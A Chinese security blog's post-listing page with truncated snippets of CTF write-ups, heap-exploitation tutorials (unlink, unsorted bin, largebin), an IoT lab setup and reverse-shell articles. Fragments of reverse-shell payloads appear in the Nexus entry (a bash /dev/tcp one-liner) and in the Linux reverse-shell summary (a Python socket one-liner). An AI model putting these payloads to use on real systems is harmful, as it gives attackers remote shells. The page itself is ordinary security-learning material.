Nexus反弹shellhttp://target/#admin/system/tasks 捕获#通用 ['/bin/bash','-c','/bin/bash -i >& /dev/t...
11月30日183 viewsNexus反弹shell已关闭评论bash
bin
Nexus反弹shell
11月30日183 viewsNexus反弹shell已关闭评论bash
bin
11月30日183 viewsNexus反弹shell已关闭评论bash
bin
羊城杯wp
1PWN1、Babyrop栈溢出,且存在后门函数;利用func1将'/cin/sh'修改为'/bin/sh',利用func2调用参数执行system('/bin/sh')即可#!usr/bin/env...
09月23日39 views评论bin
sh
红帽杯 2017 线上初赛 WriteUp
签到 (Misc10) 题目:关注公众号"CTFer的魔法棒"回复"ctf"获取flag 关注微信公众号「CTFer的魔法棒」,关注后在公众号中发送 ctf 就会自动回复本题的 FLAG flag{B...
09月15日42 views评论bin
flag
如何让脚本定时执行
HITCON 2015 BabyFirst(命令执行绕正则)
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_4/index.php 借上次的docker环境,稍微改了下...
08月21日207 views评论index
php
某设备快速代码审计 (Bash审计)
一:挖掘思路🐑#!/bin/sh#This script is created by ssparser automatically. The parser first created by MaoSh...
08月16日136 views评论bin
script
堆的unlink利用
在刷Buuctf时看了一下关于pwn的堆部分题,发现一般题型都是有套路的,所以整理下堆题中常用的技术,本文介绍unlink的原理与利用。 unlink介绍 产生原因 我们知道link有链的意思,那un...
07月18日106 views堆的unlink利用已关闭评论bin
unlink
堆的unsorted bin attack利用
介绍 概述 unsorted bin在堆题中常用于泄露libc地址,通过unsorted bin可以向任意一个地址写入一个不可控的大数字,使用前提是需要能够控制unsorted bin中chunk的b...
07月18日250 views堆的unsorted bin attack利用已关闭评论bin
chunk
堆的largebin attack利用
介绍 结构 large bin与其他bin的结构都不同,它多了两个指针fd_nextsize和bk_nextsize,直接说难以理解它的结构,先放一张图后边慢慢说它的结构: 上图是large bin的...
07月18日88 views堆的largebin attack利用已关闭评论bin
large
原创 | 堆的unsorted bin attack利用
点击上方蓝字 关注我吧介绍概述unsorted bin在堆题中常用于泄露libc地址,通过unsorted bin可以向任意一个地址写入一个不可控的大数字,使用前提是需要能够控制unsorted bi...
05月30日118 views评论bin
chunk
iot漏洞挖掘环境搭建梳理
iot环境配置总结 配置 win10 Ubuntu16虚拟机 说明 刚入门很大的一个问题是不知道要安装什么软件,对于网上搭建环境的教程都只是告诉安装什么工具,一通乱搞最后不知道自己装了什么。 文章将讲...
05月11日557 views评论iot
文件
Linux下几种反弹Shell方法的总结与理解
转自墨痕诉清风的博客常用python/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,soc...
04月24日30 views评论os
socket
14